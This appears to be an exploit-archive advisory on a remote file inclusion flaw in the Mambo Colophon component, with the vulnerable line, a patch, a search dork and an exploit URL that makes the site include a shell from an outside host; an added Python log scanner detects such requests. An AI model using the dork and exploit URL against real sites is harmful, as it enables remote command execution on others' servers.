
Mambo Colophon Component <= 1.2 Remote Inclusion Vulnerability

Author: Drago84
Risk: [ Security Risk Unsorted ]
0day-ID: 0day-ID-615
Category: web applications
Date add: 28-07-2006
Platform: unsorted
==============================================================
Mambo Colophon Component <= 1.2 Remote Inclusion Vulnerability
==============================================================




###########  Command Mambo Colophon =<1.2 ##by #Drago84#########

      Found By Drago84
Exclusive Security Italian Security

  This bug allows a remote attacker to execute commands via RFI (remote file inclusion).

page:
  admin.colophon.php

bug:
 require_once("$mosConfig_absolute_path/components/com_colophon/language/$mosConfig_lang.php");

patch:
add in admin.colophon.php (before the require_once line):
defined( '_VALID_MOS' ) or die( 'hacking attemp.' );

dork: inurl:com_colophon

expl:
http://www.site.it/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://evalsite/shell.php?
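
Added example (not part of the original advisory or of Mambo's code): a log check for the request pattern shown under expl:, generalized to any client-supplied mosConfig_* parameter, since the application is expected to set those itself. The log lines, addresses, the remote.example host and the combined log format are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines (combined log format, documentation addresses).
BASE = "/administrator/components/com_colophon/admin.colophon.php"
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Jul/2006:10:00:01 +0000] "GET /index.php?option=com_colophon HTTP/1.1" 200 5120',
    f'192.0.2.44 - - [28/Jul/2006:10:02:13 +0000] "GET {BASE}?mosConfig_absolute_path=http://remote.example/x.txt? HTTP/1.0" 200 312',
    f'192.0.2.44 - - [28/Jul/2006:10:02:20 +0000] "GET {BASE}?mosConfig_absolute_path=%68ttp%3A%2F%2Fremote.example%2Fx.txt%3F HTTP/1.0" 200 312',
    f'192.0.2.51 - - [28/Jul/2006:10:05:40 +0000] "GET {BASE}?mosConfig_lang=english HTTP/1.1" 200 88',
]

# Request field of a combined-format line: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value that begins with scheme:// points the include at another host.
REMOTE_RE = re.compile(r'^\s*[a-z][a-z0-9+.\-]*://', re.I)

def classify(line):
    """Return None, 'override' or 'remote-include' for one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    query = urlsplit(m.group(1)).query
    verdict = None
    # parse_qsl percent-decodes names and values, so %68ttp%3A%2F%2F is caught too.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if not name.lower().startswith("mosconfig_"):
            continue
        verdict = "override"            # client tried to set a config variable
        if REMOTE_RE.match(value):
            return "remote-include"     # ...and aimed it at a remote URL
    return verdict

def scan(lines):
    """Return (client_ip, verdict) for every flagged line, in input order."""
    return [(l.split(" ", 1)[0], v) for l in lines if (v := classify(l))]

if __name__ == "__main__":
    for ip, verdict in scan(SAMPLE_LOG):
        print(f"{verdict:15} {ip}")
```

Parameters sent in a POST body do not appear in an access log, so this check only covers query strings.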



